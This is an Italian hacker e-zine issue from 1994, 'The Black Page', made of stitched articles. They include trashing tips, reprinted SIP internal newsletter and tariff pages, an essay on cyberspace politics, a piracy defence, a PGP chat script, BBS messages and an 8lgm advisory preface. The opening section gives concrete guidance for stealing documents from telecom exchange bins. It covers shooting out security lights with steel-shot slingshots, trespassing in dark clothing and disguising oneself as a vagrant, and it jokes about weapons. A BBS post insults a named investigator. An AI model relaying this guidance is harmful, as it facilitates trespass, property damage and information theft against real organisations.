[[ NdR : Personalmente pensiamo che possa creare svariati problemi essere in
piu' di 3 persone. Se dovete caricare 3 grossi sacchi su una Fiat Panda e sie-
te in 4, non potrete usare i sedili posteriori. Spesso i sacchi sono piu' di
4 ... l'ideale e' essere in 2 persone. Cronometrando un'azione media si riesce
a caricare tutto e ripartire, con molta calma e decisione, in circa 12 secon-
di. Certo, una Station Vagon come quella di Amadeus e' l'ideale :))))) ]]
Equipaggiamento: Secondo me non serve niente di speciale.. se poi
credete di essere rambo...date un'okkiata all'e-
quipaggiamento avanzato :-) .. Io credo che ba-
sti semplicemente un abbigliamento Scuro (niente
abiti fluorescenti o cose spaziali :-))
EQUIPAGGIAMENTO AVANZATO:
Maschera
Guanti
Walkie Talkies / CB
Equipaggiamento Diversivo: Fumo, Gas, Bombe, Bazzoka
Se necessario porta anke qualke Mitra, Fucili, Pistole
:-))
[[ Lunga nota della redazione : L'equipaggiamento. Questa e' una parte molto
pittoresca scritta dal nostro Ice MC, ma e' verosimile che qualche volta si
incappi in qualche contrattempo. In molte centrali la spazzatura sta ALL'IN-
TERNO di recinti o di cortili delle costruzioni Sip. Quindi entrare in tali
luoghi costituisce violazione di domicilio, e in ogni caso reato. In tali casi
alcune persone molto intraprendenti hanno spesso usato sistemi piu' avanzati.
Immaginiamo uno scenario tipo, un cortile interno recintato, con grossi fari a
luce gialla e telecamere. Uno si apposta alla macchina. " partono verso il mu-
retto. Altri 2 armati di Fionda da tiro professionale (costa 50 mila lire,
molto accessibile a tutti) e pallini d'acciaio (gittata con tale fionda, circa
200 metri o piu', potenza di penetrazione : IMPRESSIONANTE), colpiscono ALCUNI
dei fari di illuminazione, cercando di creare un corridoio oscuro per raggiun-
gere la "spazzatura"). Creato il corridoio i 2 tipi in CALZAMAGLIA NERA e dal-
le provate capacita' atletiche, si lanciano verso i cassonetti, afferrano i
sacchi (solitamente leggeri in quanto contengono rifiuti cartacei) ed escono
rapidamente. Caricato tutto in macchina si riparte PIANO, A LUCI SPENTE, per
poi accelerare DOPO aver riacceso le luci a debita distanza.
Altro sistema : 2 persone vestite in modo molto trasandato, su un Ape Car ca-
rico con un po' di scatoloni di cartone e rottami metallici. Basta fingersi
"barboni" o "robivecchi". Non ci saranno problemi a prendere dei sacchi. Nes-
suno rompe i coglioni a chi cerca di farsi una pagnotta rivendendo cartoni u-
sati !!!
Altro metodo : PAGARE uno di questi barboni per fare il sopracitato lavoro.
Con poche lire potrebbero convincersi a fare per voi il giro di ricerca, gior-
nalmente.
p.s. In alcune centrali i rifiuti prima di uscire vengono TRITATI E DISTRUTTI
in appositi distruggi-documenti o inceneritori.
Quindi aggiungiamo all'equipaggiamento avanzato :
-------------------------------------------------
Per azioni Commando-Style : Calzamaglia nera o abiti scuri e comodi come tute
da ginnastica, non indossare nessun oggetto luccicante. Annerire la faccia con
un tappo di sughero bruciacchiato al fuoco. A portata di mano in macchina te-
nete delle salviettine umidificate per ripulire il viso subito dopo l'azione.
Fionda da tiro professionale con fermabraccio e pallini di ac-
ciaio da tiro o sferette in vetro.
Per azioni Barbon-Style : ApeCar, Vestiti trasandati, barba lunga, capelli
sporchi, e meglio se si puzza come porci.
Fine nota della Redazione ]]
[[ NdR : Che dire ? Ci associamo ad Ice MC, non sapendo come abbia fatto a
scrivere un testo del genere. Mah ! Comunque sia e' stato molto divertente !
:)))) ]]
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 7
==============================================================================
--------------
/----------------\ Benvenuti
| N. U. | _____/\-----
| | all' _____/\-----
\____________/ _____/\-----
o o ANGOLO _____/\-----
SIP - TELECOM
Notizie fresche di cassonetto a cura di Ice MC
==============================================================================
Attenzione : In alcuni casi i documenti da noi pubblicati hanno subito
delle "censure", che si renderanno automaticamente evidenti nel contesto della
lettura :). Cio' per evitare problemi sia a noi sia a chiunque possa sentirsi
in qualche modo "disturbato" dal contenuto di cio' che seguira'.
==============================================================================
Estratto da "Selezionando", Mensile aziendale della SIP
Anno XII numero 2, Febbraio 1992
Pagina 20
I COSTI DEL VANDALISMO
======================
Nel 1990 la Sip ha subito, per furti ed atti di vandalismo alle apparec-
chiature telefoniche, una perdita complessiva di circa 15 miliardi e 200 mi-
lioni.
Lo ha evidenziato l'elaboratore dei dati pervenuti dalle DR in una ricerca
della Protezione Aziendale.
Di questi, circa 14 miliardi e 500 milioni sono per "danni diretti" (furti di
gettoni, danni ad apparecchi e cabine telefoniche) e 700 milioni per "danni
indiretti" (mancati introiti). Si riscontra dunque rispetto al 1989 un incre-
mento del 40% circa.
Pressoche' invariato rispetto all'anno precedente e' rimasto invece il numero
complessivo dei danneggiamenti (circa 109000) a dimostrazione di una maggiore
pesantezza dei singoli atti.
C O M U N I C A T O
Si informano tutti i lavoratori interessati che a partire
dal 18 giugno e sino al 07 settembre un notiziario quotidiano su
tutti i soggiorni estivi potra' essere ascoltato formando il numero
verde relativo ai soggiorni di seguito elencati:
SOGGIORNO Numero verde per
notiziario giornaliero
LIZZANO
-------
Soggiorno di vacanze "SIP" 167/011115
Villaggio Europa
40042 - LIZZANO IN BELVEDERE (BO)
tel. 0534/53033
GRESSONEY
---------
Soggiorno di vacanze SIP 167/860012
Frazione Cioarde
11025 - GRESSONEY ST. JEAN (AO)
tel. 0125/355431
PRAGELATO
---------
Soggiorno di vacanze "Casa Alpina" 167/010115
"Don Barra" Frazione Soucheres Basses
10060 - PRAGELATO (TO)
tel. 0122/78250
AURONZO
-------
Soggiorno di vacanze "Domenico Savio" 167/860001
Localita' Cosderuoibe
32041 - AURONZO dI CADORE (BL)
tel. 0435/97311
PIANI DI LUZZA
--------------
Comunita' A
Soggiorno di vacanze "Piani di Luzza" 167/861043
33020 - FORNI AVOLTRI (UD)
tel. 0433/72366 - 72348
Comunita' B
Soggiorno di vacanze "Piani di Luzza" 167/861043
33020 - FORNI AVOLTRI (UD)
tel. 0433/72339 - 72334
A Grande richiesta..
LA SIP PARADE !!!
Trascritta da
ICE MC
A cura degli OPERATORI SIP
----------------------------------------------------------------------------
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 8
===========
MARIA JUANA
===========
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 10
Quanto segue e' stato scritto nel gennaio 1994 (quindi *ben prima*
dell'italian crackdown). Concepito per essere pubblicato su DECODER #9, e'
rimasto poi inedito.
Note:
1. il pubblico previsto per questo pezzo era quello classico di una rivista
come DECODER, i cui lettori sono gia' svezzati per quanto riguarda i temi
generali ma non padroneggiano necessariamente lo slang telematico.
2. alla luce delle proposte uscite anche in Italia in seguito al crackdown
di maggio 1994, vorrei sottolineare a scanso di equivoci che gli
apprezzamenti rivolti all'EFF e a quella che nelle conclusioni ho chiamato
"Libera Repubblica del Ciberspazio" sono evidentemente ironici.
******************************************************************
1. La democrazia elettronica e il suo business
==============================================
Le comunit in rete, le net-communities, costituiscono il
risultato piu' interessante, dal punto di vista sociologico, della
progressiva opera di cablaggio e interconnessione del globo. Per
chi le vuole intendere cosi', costituiscono degli splendidi
fenomeni da baraccone strettamente imparentati con la realta'
virtuale e piu' in generale con l'intero universo cyberpunk: coppie
che si conoscono e si sposano online, telenovelas sentimentali
vissute in prima persona, amplessi condotti a distanza con
l'ausilio di apposite periferiche, rapporti d'affari, liti, tutto
questo e altro ancora diventa il circo-Spettacolo della societa'
post-moderna, fagocitato dai media e dal loro pubblico.
Comunita', identita', appartenenza. Luogo, patria, cittadino,
straniero. Tutto si ripete e tutto muta una volta fatto il suo
ingresso nella Matrice. Chaos. Disorientamento. Panico. Nuovi
steccati con cui marcare i limiti della Frontiera, in modo che
tutti possano vedere dove finisce il mondo e fino a dove e'
ragionevole spingersi. Proliferano gli studi sulle comunita'
virtuali e sulla fenomenologia delle relazioni sociali sulle reti
telematiche, compaiono improvvisamente gli esperti che spiegano
cosa sta accadendo e gli indigeni da intervistare - *ehi, com' e'
la vita laggiu' ?
Il ciberspazio e le comunita' che lo abitano esistono dal
Principio dei Tempi, ma solo da poco e' iniziata la loro
colonizzazione. I Pionieri hanno iniziato a muoversi per portare
la loro civilta' ai Selvaggi. Diritti. Leggi. Ordine.
Howard Rheingold annuncia che si e' definitivamente avviato il
cammino verso la democrazia elettronica, ed in effetti la campagna
presidenziale statunitense 1992 di Bill Clinton ha avuto un occhio
di particolare riguardo verso gli utilizzatori delle reti
telematiche - si dice sia stata un'idea del suo vice Al Gore, un
passato lavorativo nel campo ed una conoscenza non superficiale
delle dinamiche di rete. Clinton ha vinto ed uno dei punti fermi
della sua amministrazione rimane la costruzione delle Information
Superhighways, le autostrade della trasmissione dati.
Un'infrastruttura comunicativa costituita da soluzioni tecniche di
avanguardia, capace di collegare in tempo reale qualsiasi punto
dell'immensa nazione americana. Il traffico dovrebbe essere
costituito da ogni tipo di informazione digitale: messaggi o
testi, musica, immagini, televisione e video, tutto idealmente a
costi accessibili da parte di qualsiasi cittadino.
Da parte sua l'Electronic Frontier Foundation,
l'organizzazione nata in seguito all'operazione Sun Devil per
tutelare i diritti dei cittadini nel ciberspazio, ha sempre posto
al centro dei propri obiettivi la costituzione di un network
globale (un National Public Network o una National Information
Infrastructure) che dovrebbe fare da razzo vettore per la cultura
e l'intrattenimento della societa' americana del terzo millennio.
Fiore all'occhiello dell'EFF e' l'elaborazione di una serie di
proposte operative per l'attuazione concreta di questo network,
proposte che sono state sottoposte ormai piu' volte all'attenzione
del Congresso degli Stati Uniti e a numerose sottocommissioni per
le telecomunicazioni. La "moderazione" di queste indicazioni e la
"rispettabilita'" dei membri fondatori hanno consentito all'EFF di
superare quella diffidenza e quell'alone cospirativo con cui era
stata guardata in un primo momento - l'EFF come la finanziaria
degli hackers? "nossignori, qui si parla di diritti costituzionali
nella Nuova Frontiera, si parla della storia degli Stati Uniti
d'America e Thomas Jefferson sarebbe orgoglioso dei ragazzi
dell'EFF".
*Voila'*! Wired 1.3 July/August 1993 ruota intorno ad un lungo e
articolato intervento del solito Mitchell Kapor ("fondatore della
Lotus Dev. Corporation, sviluppatore di Lotus 1-2-3, co-fondatore
dell'EFF..." just-in-case-you-don't-know-who-I-am). Where is the
Digital Highway Really Heading? The Case for a Jeffersonian
Information Policy. A partire da questo titolo il self-made man
Kapor espone paure e speranze a proposito della futura
infrastruttura comunicativa, richiamandosi agli ideali americani
di sempre. Conclude cosi' :
The Jeffersonian ideal - a system that promotes grass-roots
democracy, diversity of users and manufactrers, true
communications among the people, and all the dazzling goodies of
home shopping, movies on demand, teleconferencing, and cheap,
instant databases - is composed og high bandwidth, an open
architecture, and distributed two-way switching. It's our choice
to make. Let's not blow it.
Kapor e' uno che sa quello che dice, e si vede. Ma cosa
succedera' ora che anche il Presidente degli Stati Uniti se ne
e' accorto, *ed e' d'accordo con lui*?
EFFector Online (organo elettronico di informazione
quindicinale della fondazione), Volume 6 No.8, 28 dicembre 1993:
Subject: Gore Endorses EFF's Open Platform Approach.
Washington -- Vice President Al Gore announced at the National
Press Club today a long-term White House telecommunications policy
initiative that incorporates the major elements of the Electronic
Frontier Foundation's Open Platform policy recommendations.
BIBLIOGRAFIA ESSENZIALE:
========================
(tutti i documenti elettronici sono disponibili su vari nodi della
rete Cybernet)
Sui rapporti tra istituzioni pubbliche e ciberspazio:
-----------------------------------------------------
EFFector Online, bollettino elettronico, tutti i volumi dal 1992
al 1994.
The White House E-Mail Frequently Asked Questions, documento
elettronico, 1993.
Sugli aspetti sociali dell'interazione in rete:
-----------------------------------------------
Howard Rheingold, The Virtual Community, Addison-Wesley, 1993
Luc Pac, Sociologia del Ciberspazio: la costruzione sociale della
realta' sulle reti telematiche, in preparazione, 1994
Sulla crittografia a chiave pubblica:
-------------------------------------
PGP Pretty Good Privacy User's Manual (allegato al pacchetto PGP)
David Chaum, Achieving Electronic Privacy, Scientific American,
agosto 1992
Su Cryptoanarchy e Cypherpunks:
-------------------------------
Chuck Hammil, From Crossbows to Cryptography: Thwarting the State
Via Technology, documento elettronico, 1987
Eric Hughes, A Cypherpunk's Manifesto, documento elettronico, 1993
Timothy C. May, The Crypto Anarchist Manifesto, documento
elettronico, 1988
=====================================================================
PUBBLICITA' REGRESSO
--------------------
ATD
CARRIER 28.800
CONNECT 28.800/VFC
o Locking Com 1 at 38400.
o Connected to Node 4 at 9600 ,8,N,1.
o Connected at 28.800/VFC
----------------------------------------------------------------------
ProMatrix DOS Shell
Version .21a (c)Copyright The H.C.T. Corporation 01/31/94
(c)Copyright Hi.T.Moonweed 1992-93
Licensed To [ One Man Crew ]
C:\1MC>1mc
1) Here are the current Lines setup and some notes on each nodes:
NODE #1 - ZOOM VFAST 28.8K - Running under Intermail - +972-4-773663
NODE #2 - USR SPORSTER 14.4K - Running under ProMatrix - +972-4-772638
NODE #3 - USR SPORSTER 14.4K - Running under ProMatrix - +972-4-772860
NODE #4 - INTEL v32b 14.4K - Running under ProMatrix - +972-4-773425
NODE #5 - RACKAL-MILGO 14.4K - Running under ProMatrix - +972-4-773896
NODE #6 - ZOOM VFAST 28.8K - Running under ProMatrix - +972-4-771706
2) Now that the ZOOM modems are working fine, and this bbs will be getting
new and new modems and will switch to all 28.8K at the end, it will be
wise to get one yourself. Leave me message if you want amazing fast
28.8K modem, and hell it working great in israel. For Registers by
time: 28.8K will let you download as twice as at 14.4K by the price
of regular registration.
3) Special CD-ROM offer: Real soon you might be able to get your favorite
CD-ROMs at the prices of 120Nis (Cost in a store upto 250 - 350 Nis for
average DISC). Also, you can get your own files wormed up, by only
$60. For More info leave me a message.
4) Comment us for any problems or complains, we are always around to hear
you. We can be reached via private mail on this BBS, or by leaving a
MSG in the Mail-Box.
All The Best
Bonijoni
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 11
LeOnCaVaLlO
-----------
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 12
---------------------------------------
CHI TUTELA DANNEGGIA ANCHE TE !
di
M B F
-----------------------------------
[N.d.R. Abbiamo trovato questo messaggio nelle aree CYBERNET. E' semplicemente
FANTASTICO, sarebbe da fargli un MONUMENTO. Leggetelo, e se avete commenti in
proposito, scriveteci pure.]
Con l'augurio che il testo di questo msg finisca nelle mani di qualche respon-
sabile della BSA, ed in riferimento all'apertra dello speciale "Italian crac-
kdown" (Decoder 9), esprimo il mio parere sulla strategia di tutela software
intapresa dalla suddetta associazione.
Smentiamo l'"originale" slogan "Chi copia danneggia anche te !".
La pirateria software puo' danneggiare rivenditore, produttore e autore del
programma, ma e' priva di fondamento la dichiarazione che il fenomeno finisca
col danneggiare l'utente. La duplicazione del software, sorta di concorrente
invisibile al dominio delle software houses, ha sempre, ed e' storia, stimola-
to in modo positivo il mercato: se il produttore non avesse avuto questa sorta
di nemico fantasma contro cui combattere, giammai avrebbe offerto all'utente
gadgets, assistenza post-vendita, consulenze, pacchetti a condizioni speciali.
Le incriminate reti telematiche amatoriali sono oggi, pur considerato l' ine-
vitabile rischio di copie abusive, il piu' grande, rapido e capillare supporto
al beta-testing, allo shareware e ad altre strategie di collaudo e vendita che
nessuna software house si sarebbe potuta singolarmente permettere: una colos-
sale rete di presentazione, discussione e distribuzione demo del prodotto che
inevitabilmente spinge diversi utenti all' acquisto dell'originale.
In ogni forma ed in ogni caso, dalla diffusione amatoriale del software l'u-
tente ha sempre tratto vantaggi ed i produttori, che oggi tra i miliardi in-
cassati piangono miseria, anche. Si sono fatti conoscere senza spendere una
lira in pubblicita' e questo porta inevitabilmente a contatto gli utenti con i
prodotti originali.
L'esperienza italiana ha dimostrato, dalla benzina alle assicurazioni, che le
associazioni di categoria, ottenuto il controllo totale del mercato, se ne so-
no sempre fottute dell'utente e, ben lungi dallo scendere in reale concorrenza
tra loro, i singoli produttori si sono trovati immediatamente concordi nel-
l'aumentare i prezzi e diminuire la qualita' dei servizi.
I produttori di software, che non fanno eccezione, non aspettano altro che la
legge sulla tutela li lasci padroni del campo in modo da poter imporre prodot-
ti scadenti a prezzi maggiorati, ben sapendo che l'utente sara' costretto ad
accettare per mancanza di alternative: i segnali premonitori in questa dire-
zione (tipicamente riservati al nostro Paese) non mancano.
Se qualcuno di voi ama testare il software, smentira' con facilita' il secondo
dogma su cui poggia l'attuale concetto di tutela del medesimo: la leggenda se-
condo la quale il programmatore si farebbe un culo grande come una portaerei
per realizzare il prodotto. Ebbene, i programmi "leggeri" (i videogiochi, per
intenderci) comportano spesso e volentieri una difficolta' di realizzo abis-
salmente superiore al gestionale da prezzo milionario tanto decantato.
Il realizzatore di businnes software si appoggia al sistema operativo che gen-
tilmente gli processa tutte le funzioni di interfaccia utente senza fargli
spendere due righe di codice, o in alternativa all'incredibile numero di li-
brerie che un linguaggio ad alto livello possiede; e' inoltre piuttolto radi-
cata l'abitudine di far proliferare il software commerciabile passando al col-
legatore gli stessi moduli oggetto, differentemente ordinati, con le modifiche
necessarie e sufficienti a non far capire al cliente che nascoste in due o tre
etichette distinte ci sono in realta' le stesse routines. La disposizione del-
le icone in utilities del tutto diverse, e' straordinariamente simile; in que-
sto modo il programmatore evita di ricalcolarsi ascissa ed ordinata di rileva-
zione evento in piattaforma grafica ed incassa n volte i diritti vendendo lo
stesso modulo allo stesso utente.
Piu' che i realizzatori di piattaforme, peraltro contenti delle royalities mi-
liardarie che ogni giorno piovono sul loro capo, sono questi programmatori di
secondo livello a premere oggi per la tutela del loro "ingegno" chiedendo i-
noltre la brevettazione dell'algoritmo come supplementare metodo per realizza-
re denaro (come se gli eredi di Piatgora chiedessero una somma a chiunque vo-
lesse calcolare l'ipotenusa dati i cateti).
Altre simpatica pratica introdotte dagli sviluppatori di software e' l'espan-
sione artificiale di un file (che viene gonfiato allocando aree di memoria i-
nutili o del tutto superflue) in modo da impressionare l'utente con il numero
di dischetti che costituisce l'applicativo e giustificare il costo.
Indimostrabile ma credibile, infine, il contributo nascosto dato (in cambio di
altri favori) dai mercanti del software a quelli dell'hardware mediante la
scelta di architetture sw, tutt'altro che indispensabili ed insostituibili,
che obbligano l'utente a costose modifiche dell'hardware.
Ora sapete cosa vuole proteggere la BSA. Essendo lo Stato il suo cliente idea-
le (i ministeri italiani comprano qualunque porcata di prodotto tanto paga il
contribuente), e prendendo atto del fatto che tale associazione non si e' mai
premurata di mettere in discussione gli elevatissimi profitti concedendo agli
enti pubblici software a condizioni agevolate (le proposte fatte sono, in ter-
mini di mercato reale, una vergogna), riesaminate lo slogan e chiedetevi se di
fatto il contribuente non sia piu' danneggiato da questa forma di tutela che
prevede che l'utente paghi e taccia. I costi dell'adeguamento alla normativa
di tutti gli enti pubblici italiani, multe comprese, li paghiamo noi tutti.
Lo Stato legifera e il cittadino scuce.
Ma chi tutela l'utente dai bugs del programmatore, dai crash di sistema per
errata previsione dello stack, dai mostruosi errori di traduzione, dai collau-
di non fatti, dalle documentazioni approssimative, dalle duplicazioni sbaglia-
te dell'importatore ????
Al massimo vi ridanno una copia del software o vi fanno lo sconto (!) sulla
release successiva... mentre una software house che va a rompere i coglioni in
una scuola elementare perche' uno (UNO !) dei files installati non e' regi-
strato e poi rilascia un eseguibile con bug, dovrebbe sputare sangue per paga-
re un fiume di danni, essere rovinata per sempre.
Perche' alla software house e' stato concesso il diritto di chiedere centinaia
di biglietti da mille per una manciata di righe di compilato mentre se il mio
fornaio chiede 50mila per una pagnotta arrivano (giustamente) i Carabinieri ??
Qualcuno ha la coda di paglia, teme che l'utente abbia il materiale per fare
dei confronti e per scoprire le sporche manovre dei signori del software...
allora si chiudano le reti, si proibisca la duplicazione a tutti i livelli, si
promuova una campagna delatoria nazista del tipo "denunciate il vicino di casa
che copia!" (non e' uno scherzo, purtroppo! Ci sono i tagliandi prestampati
per la denuncia su giornali e riviste) cosi' finalmente anche i prodotti sca-
denti troveranno spazio, l'utente sara' fottuto ancora una volta e gli adepti
della BSA continueranno a sguazzare nel denaro ridendo alla faccia nostra!
M F B
INSTALLATION
I)
You should probably make sure your PGP "config.txt" file contains
a line that says:
VERBOSE = 0
This is to keep the PGP "noise" messages from interfering with
your chat.
II)
There are 3 script files included below. Follow the directions
for the installation of each of them.
FILE: sendpgp.bat
The following batch file should be placed in your PGP directory
with the name sendpgp.bat.
------------------------- CUT HERE -------------------------
echo off
rem Run this with one argument -- PGP userid of person you are sending to.
rem Be sure to set PGPPASS in environment.
:abc
echo Enter PGP chat message (end with CTRL-Z):
copy con sendpgp.txt
:def
if exist sendpgp.asc goto def
pgp -esa sendpgp.txt %1
del sendpgp.txt
goto abc
------------------------- CUT HERE -------------------------
FILE: recvpgp.bat
The following batch file should be placed in your PGP directory
with the name recvpgp.bat.
------------------------- CUT HERE -------------------------
echo off
rem Receives PGP chat messages. Be sure to set PGPPASS in environment.
:abc
if not exist recvpgp.pgp goto abc
pgp recvpgp.pgp -o recvpgp.txt
type recvpgp.txt
del recvpgp.txt
del recvpgp.pgp
goto abc
------------------------- CUT HERE -------------------------
FILE: pgpchat.slt
The following Telix script should be placed in your Telix directory
with the name pgpchat.slt. If your PGP directory is somewhere
other than "\pgp\" relative to your Telix directory, you will
have to edit "pgpchat.slt" and change all references to the
"\pgp\" path to the path of your PGP directory relative to your
Telix directory.
Then you should execute the command:
C:\telix>cs pgpchat.slt
This will generate a file named "pgpchat.slc" which is your Telix
script executable.
------------------------- CUT HERE -------------------------
main()
{
int t1;
str buf[80];
t1=track("-----END PGP MESSAGE-----",0);
capture("\pgp\recvpgp.asc");
while (1)
{
terminal();
if(track_hit(0) == t1){
capture("*CLOSE*");
frename("\pgp\recvpgp.asc","\pgp\recvpgp.pgp");
capture("\pgp\recvpgp.asc");
}
if(filefind("\pgp\sendpgp.asc",0,buf)){
frename("\pgp\sendpgp.asc","\pgp\sendasc.txt");
type_file("\pgp\sendasc.txt");
fdelete("\pgp\sendasc.txt");
}
delay(10);
}
}
type_file(str fname)
{
int f;
str buf[100];
int ichar, lines_sent = 0;
f = fopen(fname, "r");
if (!f)
return -1;
host_send("^M^J");
while (1)
{
if (fgets(buf, 80, f) == -1)
{
fclose(f);
return 1;
}
host_send(buf);
host_send("^M^J");
terminal();
}
}
//////////////////////////////////////////////////////////////////////////////
host_send(str outstr)
{
cputs(outstr);
}
//////////////////////////////////////////////////////////////////////////////
------------------------- CUT HERE -------------------------
1)
>From the Windows Program Manager, bring up three DOS Prompt windows.
2)
In one window, enter the PGP directory and execute:
C:\pgp>SET PGPPASS=<your pgp pass phrase>
C:\pgp>recvpgp
3)
In another window, enter the PGP directory and execute:
C:\pgp>SET PGPPASS=<your pgp pass phrase>
C:\pgp>sendpgp <userid>
Where <userid> is the PGP userid you would use to encrypt a message
to the person you will be chatting with.
4)
In the third and last window, enter the Telix directory and execute:
C:\telix>telix
5)
To test out your end of the chat system without bothering your friends,
make sure your modem is echoing your commands by typing:
ATZ<cr>
It should echo the "ATZ" on your terminal screen and respond with "OK".
6)
Press ALT-G in Telix and enter "pgpchat" at the prompt to activate
the Telix script.
7)
Activate the "sendpgp.bat" window.
You should see the prompt:
"Enter PGP chat message (end with CTRL-Z):"
8)
Do what the prompt says.
It should then begin encrypting what you typed and return you
to the prompt.
You should then see the Telix window scroll (painfully slowly)
a PGP encryption block.
Sometime later, the "recvpgp.bat" window should display the
same message you entered in the "sendpgp.bat" window.
If so, your end of the system is working.
CAVEAT: You WILL see errors crop up in about 1 in 5 test messages
that you try to send. This is due to the fact that the "self-test"
is using the modem's character echo to simulate the presence of
another user and the modem will, from time to time, see an
"AT" command in the middle of a PGP encyption block. When this
happens, you should see a modem response in the middle of the
PGP encryption block on the Telix screen and PGP error messages
later cropping up on the "recvpgp" screen. Ignore these errors.
9)
Go to the Telix window and press ALT-X to quit Telix.
10)
Reenter Telix, but this time, hold off on executing the
"pgpchat" script.
11)
Dial your friend's modem and make sure you are connected.
12)
Once the modem connection is established with your friend, press
ALT-G in Telix and enter "pgpchat" at the prompt to activate the
Telix script.
13)
Activate the "sendpgp.bat" window and start typing.
You should see your friend's messages pop up in the "recvpgp.bat"
window.
When you are ready to quit, just kill all three DOS windows.
TIPS ON USAGE
I)
Don't send more than about a message per 30 seconds. If you send
faster than that, the PGP data stream might get backed up. The
flow control is there but it is minimal.
II)
You can send text files by the following procedure:
1) Go into Windows' Notepad program and open the file you want to send.
2) Press SHIFT-CONTROL-END to select the entire file.
3) Press CONTROL-INS to copy the file to your clipboard.
4) Reactivate the "sendpgp.bat" window.
5) Press SHIFT-SPACE.
6) Press "e".
7) Press "p".
8) Press CONTROL-Z
This should cause the entire text file to be typed into your
"sendpgp.bat" window, encrypted and sent to your friend.
III)
Your and your friend may have a bit of trouble reading more than
25 lines of text at a time since the "recvpgp.bat" window just
scrolls off the top (its just a DOS window after all). You might
want to run that DOS window under one of the "scroll buffer"
programs that lets you scroll back and see what has scrolled
off the DOS prompt window.
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 14
--------------------------
LE NUOVE TARIFFE DI ITAKAZ
--------------------------
Aggiornato al 31.2.94
X.28 COMMUTATO
==============
Tariffe di Accesso
==================
Canone di abbonamento
menisile L. 12.500
^^^
Modem Multistandard (vedi
listino modem)
Traffico Nazionale
- Tariffa telefonica per il collegamento alla centrale ITAPAC
- per ogni chiamata L. 20
- occupazione porta (per ogni minuto) L. 20
Collegamento su ITAPAC:
- per ogni minuto L. 5,5
- per ogni segmento fino a 200.000 seg./mese
L. 1,2
oltre 200.000 seg./mese
L. 0,7
Riduzioni sul traffico
----------------------
Dalle ore 22 alle ore 7 di ogni giorno, il sabato e i giorni festivi si
applicano le seguenti tariffe ridotte:
- per ogni minuto L. 2
- per ogni segmento fino a 200.000 seg./mese
L. 0,36
oltre 200.000 seg./mese
L. 0,21
Prestazioni opzionali
---------------------
Gruppo Chiuso d'Utente (CUG)
utente responsabile L. 56.000/mese
utente di CUG L. 1.000/mese
Documentazione Addebiti L. 35
per ogni chiamata virtuale
documentata
Modifica NUI (password),
opzioni, parametri L. 50.000
Aggiornato al 1.4.93
TRAFFICO INTERNAZIONALE
=======================
Le tariffe di seguito descritte valgono per ogni tipo di accesso.
Europa e Bacino Paesi Extraeuropei
del Mediterraneo
Tariffa a tempo Tariffa a tempo
--------------- ---------------
fino a 200 ore/mese fino a 200 ore/mese
L. 86,4/min. o fraz. L. 198,018/min. o fraz.
oltre 200 ore/mese oltre 200 ore/mese
L. 60,48/min. o fraz. L. 138,618/min. o fraz.
----------------------------------------------------------------------------
Messaggeria Black Jack
(compianta NUA 21124062 :( ora solo da VDT ma non so la pagina)
Area : Sysop
MSG N. 2230 Del: 02-06-94 21:03:02
Di: PhalanX
in nome di una ristretta cerchia di persone che irridono al clericalismo
e che aborriscono chiunque tenti di giustificare l'essenza delle cose in
base a preconcetti mistici, io chiedo formalmente l'apertura di un'area
destinata allo scambio di invettive contro la simbologia (e si badi: solo
essa, e NON i concetti) clericale e religiosa in genere. Mi candido alla
moderazione, ben conscio delle capacita' di moltri altri utenti in materia.
---------------------------------------
Msgr. Arkimede
Area GENERALE
Mitt JOE
Data 28/08/94 02:17:18
Msg#1495 1/1 Object: ore 2.15
Un'altra partenza.
L'estate volge al termine
minuto dopo minuto.
E' forse come svegliarsi da un sogno.
Viva la Guinness.
Le ore piccole e le grandi donne.
Viva me.
Joe
p.s.: chissa' qual'e' la verita'.
---------------------------------------
Decoder BBS
Area: Dibattito CyberPunx
Msg#: 6647 Date: 20 Aug 94 17:33
From: Ice Man Read: Yes Replied: Yes
To: All Mark:
Subj: Ai mie tempi c'era la guerra!
... E voi pensevate ke fosse finita???
da "LA STAMPA" di Sabato 20 Agosto..
Le indagini telematike di uno studente ingaggiato dai giudici di milano
U N D E T E C T I V E D E L C Y B E R S P A Z I O
Cosi' ho katturato i pirati informatici
-> Riporto solo i pezzi piu interessanti...
...Cotrozzi Massimo la vita la passa per meta' a Milano e per meta' nel
suo computer. 12 ore in un posto 12 ore in un altro.
Lo ingaggiano le socita' commerciali per proteggere dalle intrusioni
le loro banke dati, lo ingaggiano i giudiciper skoprire i kolpevoli dei
reati di pirateria informatika.
-> Ok kazzo kuesto mi sempra gia di averlo letto ... solo ke era su un libro
di sterling!!! ma il meglio deve ankora venire!!!
...Massimo Cotrozzi laureato in informatica nove annni poassati a viaggiare
tra terra e cyberspazio a skoprire i segreti della informatica, a capire
come si violano le difese telematike e kome si possono renderle meno
vulnerabili, a interpretare la filosofia degli hacker e kuella dei
crekers.
-> In pratika sto stronzo si e' fatto una 15ina di sistemi ha preso le sue nui
si sara' fatto passae le frekuenze per boxare e un giorno si e' svegliato e
ha detto... Kazzo mi annoi di nuovo!!!!
Ke faccio?? bhe adesso passo dalla parte opposta!!!!!
Te lo diko kon tutto il kuore e spero ke sto messaggio tu lo legga karo il
mio Cotrozzi
S T R O N Z O !
In the light of the current move towards openness in the discussion of compu-
ter security related matters, the [8lgm] team have decided to release some of
their back catalogue of [8lgm] advisories previously unavailable to outsiders.
Those advisories deemed suitable for publication are known to the relevant or-
ganisations concerned (e.g. CERT). However, these vulnerabilities have not
been given the publicity required so that system administrators can correct
the problem. In most cases, fixes are currently available; please contact
your vendor directly for patch details.
[8lgm] was created in early 1989 by several individuals with a common interest
in computer security. Up until 1991, [8lgm] members actively used vulnerabi-
lities to obtain access to many computer systems world-wide. After this pe-
riod, any results of research have been reported and passed onto vendors. Ho-
wever, this work has been carried out on a limited number of platforms, so
the true extent of any vulnerability is currently unknown.
If the problem described in any advisory is discovered to affect operating sy-
stems not mentioned, please e-mail [8lgm] at 8lgm@bagpuss.demon.co.uk, giving
full details so that this information can be added to the bug database.
Please do not hesitate to contact [8lgm] with any questions related to compu-
ter security. An [8lgm] team member will deal with your enquiry in the stric-
test of confidence, and provide assistance whenever required.
8lgm-bugs@bagpuss.demon.co.uk (To report security flaws)
